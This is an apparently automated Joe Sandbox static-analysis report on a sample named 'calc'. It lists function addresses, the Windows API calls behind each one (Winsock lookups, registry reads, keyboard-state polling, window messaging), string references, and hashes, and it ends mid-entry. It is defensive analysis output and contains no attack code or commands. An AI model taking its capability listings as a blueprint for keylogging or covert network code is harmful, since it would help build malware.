Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56

FreeLibrary.KERNEL32(?,0000008C,000000FF,00000000,00000000), ref: 0042AD6D
FreeLibrary.KERNEL32(?), ref: 0042B012
FreeLibrary.KERNEL32(?), ref: 0042B01C
FreeLibrary.KERNEL32(?), ref: 0042B026

Strings

su, xrefs: 0042AD6D, 0042ADE8, 0042AF18

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$Load$String$AddressProc
String ID: su
API String ID: 2369986452-45427494
Opcode ID: 63ac6f70c11f3603ce28654a140b3cbbe2cadf9ebbd1ba77de62dfe0f6e3a0ff
Instruction ID: 92fbcbd25f89717f49a0dea9fa4711d163105862c477200d8f3d6367005632a0
Opcode Fuzzy Hash: 63ac6f70c11f3603ce28654a140b3cbbe2cadf9ebbd1ba77de62dfe0f6e3a0ff
Instruction Fuzzy Hash: 92A10C71D0052DEBDF11ABA6EC418EEB7B8FF48304B54406BE811B3161DB38AA45DF69

Function 0043B5F6 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 238COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,?,?,?), ref: 0043B60B

Strings

HKEY_CURRENT_CONFIG, xrefs: 0043B760
HKLM, xrefs: 0043B68B
HKCR, xrefs: 0043B707
HKCC, xrefs: 0043B77E
HKU, xrefs: 0043B87F
HKCU, xrefs: 0043B7F8
HKEY_USERS, xrefs: 0043B859
HKEY_CURRENT_USER, xrefs: 0043B7DA
HKEY_CLASSES_ROOT, xrefs: 0043B6E9
HKEY_LOCAL_MACHINE, xrefs: 0043B66D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: ea952f2150a40c486bed9d5bb19761509c9b5ef807b376e14e84e5588de93987
Instruction ID: ab713c0e03b4ebef2095cd19d918e8f5394ede6d00fec2e271b3f25400b9f2ae
Opcode Fuzzy Hash: ea952f2150a40c486bed9d5bb19761509c9b5ef807b376e14e84e5588de93987
Instruction Fuzzy Hash: BB8102315447486AEF25ABA4DC427ED3B60EF45314F14418BED413A2E2C77C9E89C7AA

Function 00431897 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 223COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004319A8
VariantInit.OLEAUT32(DC), ref: 00431A82
VariantClear.OLEAUT32(DC), ref: 00431A92
VariantClear.OLEAUT32(00000001), ref: 00431AEA

Strings

F, xrefs: 004318F3
_NewEnum, xrefs: 004318B4
Incorrect Object type in FOR..IN loop, xrefs: 00431A66
DC, xrefs: 00431ADD, 00431AE6
get__NewEnum, xrefs: 004318BB
Null Object assignment in FOR..IN loop, xrefs: 00431A72, 00431AF2
DC, xrefs: 00431A7E, 00431A8E, 00431A9A, 00431A81, 00431A91, 00431A9D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Variant$ClearInit
String ID: DC$DC$F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 2610073882-3162301050
Opcode ID: 95fb134cfc80a911596242a7b61f76450ee34d4b006b6fd6f10a8658da58380b
Instruction ID: 8083f426d9f894f1bc40dfaa809b4d26ab45a09ced0e321bccf615fb93141159
Opcode Fuzzy Hash: 95fb134cfc80a911596242a7b61f76450ee34d4b006b6fd6f10a8658da58380b
Instruction Fuzzy Hash: 89817C71900209ABCF20DFE5CC84EEEB7B8AF08315F10456EF515A72A1D7B89E45CB69

Function 0042ED85 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 212networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 0042EE13
inet_addr.WS2_32(00000000), ref: 0042EE3D
gethostbyname.WS2_32(00000000), ref: 0042EE46
FreeLibrary.KERNEL32(?,00000000,00000000), ref: 0042EE72
GlobalAlloc.KERNEL32(00000040,00000040), ref: 0042EECC
FreeLibrary.KERNEL32(?,00000000,00000000,00000101,?,00000000), ref: 0042EEFF
FreeLibrary.KERNEL32(?,00000000,00000000,00000101,?,00000000), ref: 0042EF09
FreeLibrary.KERNEL32(?,00000000,00000000,00000101,?,00000000), ref: 0042EF13
GlobalFree.KERNEL32(00000000), ref: 0042EFC5
WSACleanup.WS2_32 ref: 0042EFCB

Strings

su, xrefs: 0042EE72, 0042EEF4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Free$Library$Global$AllocCleanupStartupgethostbynameinet_addr
String ID: su
API String ID: 3097805930-45427494
Opcode ID: 8f061333444a43ffdaff18d45f32bf790a523f2a2d6c08af46e4de7f2615d1a7
Instruction ID: c17d4d86a3619faaae84c48cea73a3c8c8d1c6773a1b105f31c35f6741a2f7fe
Opcode Fuzzy Hash: 8f061333444a43ffdaff18d45f32bf790a523f2a2d6c08af46e4de7f2615d1a7
Instruction Fuzzy Hash: 48719C31A00229EBDF20EFA6E9819AEB7B4BF04314F95413BF514A7291C7389D85CB59

Function 004126BC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(0047A6A8,000000FF,00000000,0000002C), ref: 0041272A
SetMenuItemInfoW.USER32(0047A6A8,00000004,00000000,0000002C), ref: 00412760
Sleep.KERNEL32(000001F4,0047A6A8,?,00000000), ref: 00412771

Strings

,, xrefs: 004126CF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: InfoItemMenu$Sleep
String ID: ,
API String ID: 1196289194-3772416878
Opcode ID: 840733704e8b72faa693b97eaa8618e70ee49a5f4cbdb18606633d748c6003fc
Instruction ID: 673f1c98b9e666d0017e1a7833c8b8cc34a90406b02290c59e1f383dc2874613
Opcode Fuzzy Hash: 840733704e8b72faa693b97eaa8618e70ee49a5f4cbdb18606633d748c6003fc
Instruction Fuzzy Hash: 5D51B670904208EFEF11DF94CA84AEEBBB4BF00308F24415EE551E2291D3B89EE5DB19

Function 004305B5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 143registryCOMMON

Download Yara Rule

APIs

StringFromIID.COMBASE(?,?), ref: 004305D5
CoTaskMemFree.COMBASE(?), ref: 00430627
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0043063F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0043066D
CLSIDFromString.COMBASE(00000000,?), ref: 0043069C
RegQueryValueExW.ADVAPI32(?,Version,00000000,00000000,?,00000001), ref: 004306D1
LoadRegTypeLib.OLEAUT32(?,00000000,00000000), ref: 00430724
RegCloseKey.ADVAPI32(?), ref: 0043074D

Strings

interface\, xrefs: 004305F4
Version, xrefs: 004306C2
\TypeLib, xrefs: 0043060D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FromQueryStringValue$CloseFreeLoadOpenTaskType
String ID: Version$\TypeLib$interface\
API String ID: 3215668907-939221531
Opcode ID: 4832374c04a19b00eb409d5101276f53bde8b5d7d4d5d05a0b0921a33f83a77a
Instruction ID: b655124fc70be52ddb42d0f67ed840a6ab8a9596b0c865405af6a81620bfd038
Opcode Fuzzy Hash: 4832374c04a19b00eb409d5101276f53bde8b5d7d4d5d05a0b0921a33f83a77a
Instruction Fuzzy Hash: AC416076800118EBCF10EBA5DC89CDEBBB8FF48315F11056AF915A3161DB349E44DB64

Function 004108E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041090B
MapVirtualKeyW.USER32(00000010,00000000), ref: 00410916
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410924
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410932
MapVirtualKeyW.USER32(00000011,00000000), ref: 0041093D
MapVirtualKeyW.USER32(00000012,00000000), ref: 00410948
GetKeyboardLayoutNameA.USER32(?), ref: 00410954
VkKeyScanA.USER32(00000000), ref: 00410968

Strings

0809, xrefs: 004109C2
0409, xrefs: 00410980
0002, xrefs: 00410999

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Virtual$KeyboardLayoutNameScan
String ID: 0002$0409$0809
API String ID: 983989243-2507973371
Opcode ID: e26775cac1d69ddc040335cf172753ea57e0579228d91fe694fe3cb24bc9a97e
Instruction ID: bec2c5736e6295f485510cdfee5d2b4694b43ecfdd9fd1275449d8d207afea38
Opcode Fuzzy Hash: e26775cac1d69ddc040335cf172753ea57e0579228d91fe694fe3cb24bc9a97e
Instruction Fuzzy Hash: 4241F971549388ACF720EBB95C0AB977BD89F61309F14006BE594D7183E6FCA488871E

Function 004149FA Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80sleeptimewindowCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00414A04
timeGetTime.WINMM ref: 00414A1A
Sleep.KERNEL32(0000000A), ref: 00414A2E
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00414A72
SetActiveWindow.USER32 ref: 00414A93
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00414AA1
SendMessageW.USER32(00000010,00000000,00000000), ref: 00414AC1
Sleep.KERNEL32(000000FA), ref: 00414ACC
IsWindow.USER32 ref: 00414AD8
EndDialog.USER32(00000000), ref: 00414AE9

Part of subcall function 00415D17: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00415D3E
Part of subcall function 00415D17: GetCurrentThreadId.KERNEL32 ref: 00415D45
Part of subcall function 00415D17: AttachThreadInput.USER32(00000000), ref: 00415D4C

Strings

BUTTON, xrefs: 00414A64

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$Thread$MessageSendSleepTimetime$ActiveAttachCurrentDialogFindInputProcess
String ID: BUTTON
API String ID: 2994871518-3405671355
Opcode ID: 9d3f59f38da363da99795c867b164ececa99e12e4f25dd3b184a9f13c30bfd9f
Instruction ID: d49f01f2a66b3b3a274d5297f5f74a72a47ae71303348ed1a4dedd9e64d469b0
Opcode Fuzzy Hash: 9d3f59f38da363da99795c867b164ececa99e12e4f25dd3b184a9f13c30bfd9f
Instruction Fuzzy Hash: C621C532398605FFF7116F20FE899AA3BA8EBC4382B110476F20591471D7658DD09B2C

Function 00415B6C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00415BDA
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00415BEE
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00415BFE
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00415C11
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00415C1E

Strings

play PlayMe wait, xrefs: 00415C0C
close PlayMe, xrefs: 00415BE3, 00415BED, 00415C16
status PlayMe mode, xrefs: 00415BD5
alias PlayMe, xrefs: 00415BB0
open , xrefs: 00415B80
play PlayMe, xrefs: 00415C19

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: a6c9c36fc8fcd97dcfd1441e7ee06fd675b2ab39cddef83ac0e58676806962c8
Instruction ID: b1822fddb4a767dec974c595ee76e1b150c2e2547c3de3647d388603338b342e
Opcode Fuzzy Hash: a6c9c36fc8fcd97dcfd1441e7ee06fd675b2ab39cddef83ac0e58676806962c8
Instruction Fuzzy Hash: A1119670D4020CBEEB10ABA1ECC1EEF7B7CDF44798F504167B410A2091E7A89E8486A9

Function 004301FC Relevance: 18.2, APIs: 12, Instructions: 193COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(-00000048), ref: 00430217

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: ba28c3041cd4c6874d2c18b63d8c63254bd3445e0bfa78ee4fa0ae738adc1948
Instruction ID: 9d7999fc2cd5a7606b955a0f693963966027de556b63af81db066f69122e02aa
Opcode Fuzzy Hash: ba28c3041cd4c6874d2c18b63d8c63254bd3445e0bfa78ee4fa0ae738adc1948
Instruction Fuzzy Hash: C4618E31900214EBCB01DFA5CC989AEB7B4FF0C315F2096AAE815E7251DB78DE41DB59

Function 004085D5 Relevance: 18.2, APIs: 12, Instructions: 180windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,000000FF,00000000), ref: 004086B2
SendMessageW.USER32(?,?,00000000,00000000), ref: 004086C2
CharNextW.USER32(00000000,?,004276A0,00478410,00000000,?), ref: 004086EE
SendMessageW.USER32(?,?,00000000,00000000), ref: 00408701
SendMessageW.USER32(?,?,00000000,?), ref: 00408715
SendMessageW.USER32(?,?,000000FF,00000000), ref: 00408742
SendMessageW.USER32(?,?,00000000,00000000), ref: 00408756

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 8c88817049833f1abaebf2bb00d923f4e82f64ab36498c7e6d37ed6b6d0516a9
Instruction ID: b12c777ac9d0b86c010d8e88b360e31c6d53ff0b2d7a97ce2183b31ba9e66b68
Opcode Fuzzy Hash: 8c88817049833f1abaebf2bb00d923f4e82f64ab36498c7e6d37ed6b6d0516a9
Instruction Fuzzy Hash: AB519E71600308EBDF219F64CE45BAA3BA5AF44314F24412FF9A4A62E1DB79DC52CF58

Function 0040E741 Relevance: 18.2, APIs: 12, Instructions: 168COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0040E764
GetWindowRect.USER32(00000000,?), ref: 0040E77C
MoveWindow.USER32(00000001,0000000A,?,?,?,00000000), ref: 0040E7D4
GetDlgItem.USER32(?,00000002), ref: 0040E7DE
GetWindowRect.USER32(00000000,?), ref: 0040E7F0
MoveWindow.USER32(00000001,?,00000000,?,?,00000000), ref: 0040E842
GetDlgItem.USER32(?,000003E9), ref: 0040E84F
GetWindowRect.USER32(00000000,?), ref: 0040E861
MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 0040E8A4
GetDlgItem.USER32(?,000003EA), ref: 0040E8AE
MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0040E8CA
InvalidateRect.USER32(?,00000000,00000001), ref: 0040E8D3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3a1dcebfad33eec77ff6b25477c45e905561baac400562b15739efe02f938839
Instruction ID: 9b8544a1d6d145af6ded319fd2928cc87b79eb69e54e7660af3b66d43001a818
Opcode Fuzzy Hash: 3a1dcebfad33eec77ff6b25477c45e905561baac400562b15739efe02f938839
Instruction Fuzzy Hash: 7E5147B1E0020AAFDF04CFA9DD45AAEBBB9FB44311F14812AF515E7290E770AE00CB54

Function 00410F35 Relevance: 18.2, APIs: 12, Instructions: 152keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(00000001), ref: 00410FD3
SetKeyboardState.USER32(00000001), ref: 00411021
GetAsyncKeyState.USER32(00000011), ref: 00411035
GetKeyState.USER32(00000011), ref: 00411043
GetAsyncKeyState.USER32(00000012), ref: 00411064
GetKeyState.USER32(00000012), ref: 0041106D
GetAsyncKeyState.USER32(000000A0), ref: 00411093
GetKeyState.USER32(000000A0), ref: 0041109B
GetAsyncKeyState.USER32(000000A1), ref: 004110C0
GetKeyState.USER32(000000A1), ref: 004110C8
GetAsyncKeyState.USER32(0000005B), ref: 004110E9
GetKeyState.USER32(0000005B), ref: 004110F3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 551dbde3f8065375312253c687410048079869a797f1a7c7e8a518f2e63a8ba4
Instruction ID: 0a29760dd22265b3d953272a9e43809e9e5c528ef8a2cbe6b81addde34154a84
Opcode Fuzzy Hash: 551dbde3f8065375312253c687410048079869a797f1a7c7e8a518f2e63a8ba4
Instruction Fuzzy Hash: 8D51D4306047859AEB349B34C94A7DB7AC09F19784F04041EEA8D973E2D7FC99C5C61D

Function 00431152 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 205COMMON

Download Yara Rule

APIs

StringFromCLSID.COMBASE(?,00000000), ref: 00431209
CoTaskMemFree.COMBASE(00000000), ref: 00431225
StringFromIID.COMBASE(?,00000000), ref: 0043130F
CoTaskMemFree.COMBASE(00000000), ref: 00431327

Strings

CLSID\, xrefs: 00431233
localserver32, xrefs: 00431290
ProgID, xrefs: 00431297
ToolBoxBitmap32, xrefs: 0043126D
inprocserver32, xrefs: 00431274
Interface\, xrefs: 0043132D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FreeFromStringTask
String ID: CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32
API String ID: 910554386-2412192186
Opcode ID: 6dfcbc6126d7e1adef419d680d0bc0d4d3c0ea62a5b762055ce8b29b0c99149b
